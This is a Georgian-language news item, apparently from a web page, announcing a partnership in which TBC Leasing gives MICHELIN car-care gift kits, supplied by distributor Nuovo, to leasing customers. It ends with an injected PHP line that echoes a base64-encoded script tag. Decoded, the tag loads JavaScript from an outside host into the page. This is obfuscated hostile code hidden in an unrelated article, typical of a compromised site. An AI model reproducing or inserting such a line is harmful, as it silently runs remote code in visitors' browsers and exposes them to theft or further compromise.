celsiusi
ავერსი საქკაბელი

თიბისი ლიზინგმა ლეგენდარულ ფრანგულ ბრენდთან MICHELIN-თან თანამშრომლობის მემორანდუმი დადო, რომლის ფარგლებშიც, კომპანიის ოფიციალური პარტნიორი ხდება საქართველოში. აღნიშნული კოლაბორაციის ფარგლებში, მომხმარებელი განსაკუთრებულ შეთავაზებებს მიიღებს.

„ჩვენი გუნდისთვის მნიშვნელოვანია, რომ არა მხოლოდ სპეციალური სალიზინგო პირობებით, არამედ დამატებითი ღირებულებებით გაანებივროს მომხმარებელი. სწორედ ამიტომ, MICHELIN-თან თანამშრომლობით შევქმენით სპეციალური სასაჩუქრე ნაკრებები, რომელსაც სხვადასხვა კატეგორიის ავტომობილის დაფინანსებისას გადავცემთ საჩუქრად. ვფიქრობთ, რომ თავი მოვუყარეთ მანქანის მოვლის ისეთ ატრიბუტებს, რომელიც ყველა მძღოლს გამოადგება. სამომავლოდ კი, კიდევ უფრო მასშტაბურ შეთავაზებებს ვგეგმავთ“ - ზურაბ გუგუშვილი, თიბისი ლიზინგის კომერციული დირექტორი.

„ჩვენი კოლაბორაცია განსაკუთრებულია ავტომომხმარებლებისთვის, რადგან MICHELIN-ის ნაკრებები, რომლებსაც მომხმარებლები მიიღებენ ბენეფიტის სახით შერჩეულია მათი უსაფრთხო გადაადგილებისთვის და გამოცდილია პრაქტიკაში. ჩვენი საერთო მიზანია ავტომომხმარებლების საჭიროებებზე ზრუნვა. ვფიქრობთ სამომავლოდ ბევრ საინტერესო პროექტს განვახორციელებთ.“ - ინგა პეტრიაშვილი, შპს ნუოვოს კომერციული დირექტორი.

ცნობისთვის, MICHELIN 1889 წელს საფრანგეთში დაარსდა. თავდაპირველად კომპანია ორიენტირებული იყო ველოსიპედის საბურავების წარმოებაზე, მაგრამ მალევე გააფართოვა არეალი და მთლიანად ავტოინდუსტრიის განვითარებაში ითამაშა მნიშვნელოვანი როლი. ბრენდმა დაიწყო ავტომობილის აქსესუარების წარმოება, რამაც მალე დაიმსახურა მომხმარებლის სიყვარული და განსაკუთრებული ნდობა.

შპს ნუოვო არის MICHELIN-ის ბრენდის ავტო აქსესუარების ოფიციალური დისტრიბუტორი ამიერკავკასიაში. საქართველოს ბაზარზე MICHELIN-ის ბრენდის ავტომობილის აქსესუარები შპს ნუოვომ 2022 წელს შემოიტანა და ახორციელებს ამ პროდუქციის დისტრიბუციას თბილისში, რუსთავში, ქუთაისსა და ბათუმში.

116
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");